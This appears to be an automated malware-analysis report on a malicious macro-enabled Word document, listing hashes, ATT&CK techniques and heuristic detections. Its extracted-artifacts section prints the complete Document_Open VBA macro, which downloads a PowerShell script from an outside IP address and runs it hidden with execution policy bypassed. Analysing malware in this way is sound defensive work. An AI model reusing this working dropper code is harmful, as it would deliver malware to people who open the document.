Office (OOXML) / .DOCX malware analysis — malicious · ea68f6946bafb4f2

MALICIOUS

Office (OOXML) / .DOCX

104.9 KB Created: 2025-12-17 20:45:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2026-06-12

MD5: c7a68346981a439e36f0b3396e558827 SHA-1: 5374ea80ecf847493025636eef59a6d018a36a8d SHA-256: ea68f6946bafb4f2beef3ba593f418f865fa00aaffe142be5c465edbe2e0151d

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro that executes upon opening the document. This macro is designed to download a PowerShell script from the URL "http://77.83.39.60/me/RAW.ps1", save it to "C:\Temp\RAW.ps1", and then execute it using PowerShell. This indicates a downloader or droppper functionality.

Heuristics 9

VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Dim shell As Object, fso As Object, http As Object
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set shell = CreateObject("WScript.Shell")
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        shell.Run "PowerShell -NoProfile -ExecutionPolicy Bypass -File """ & scriptPath & """", 0, True

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
        stream.Write http.ResponseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set shell = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://77.83.39.60/me/RAW.ps1 Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1390 bytes
SHA-256: `4d7350e886595b38703f9d6f8c782dfd84104756f26b6bb3bba4a599789960f4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim scriptUrl As String, scriptPath As String, tempDir As String Dim shell As Object, fso As Object, http As Object Dim stream As Object scriptUrl = "http://77.83.39.60/me/RAW.ps1" tempDir = "C:\Temp" scriptPath = tempDir & "\RAW.ps1" On Error Resume Next Set shell = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") Set http = CreateObject("WinHttp.WinHttpRequest.5.1") If Not fso.FolderExists(tempDir) Then fso.CreateFolder tempDir End If http.Open "GET", scriptUrl, False http.Send If http.Status = 200 Then Set stream = CreateObject("ADODB.Stream") stream.Open stream.Type = 1 stream.Write http.ResponseBody stream.SaveToFile scriptPath, 2 stream.Close shell.Run "PowerShell -NoProfile -ExecutionPolicy Bypass -File """ & scriptPath & """", 0, True End If End Sub Attribute VB_Name = "NewMacros" Sub t() ' ' t Macro ' ' End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	16384 bytes
SHA-256: `8efd9df2dcc590b39e5dd4581c2c20652ebedd4c49689046c9002381f4df8839`

Open this report in the interactive analyzer, or submit your own file for analysis.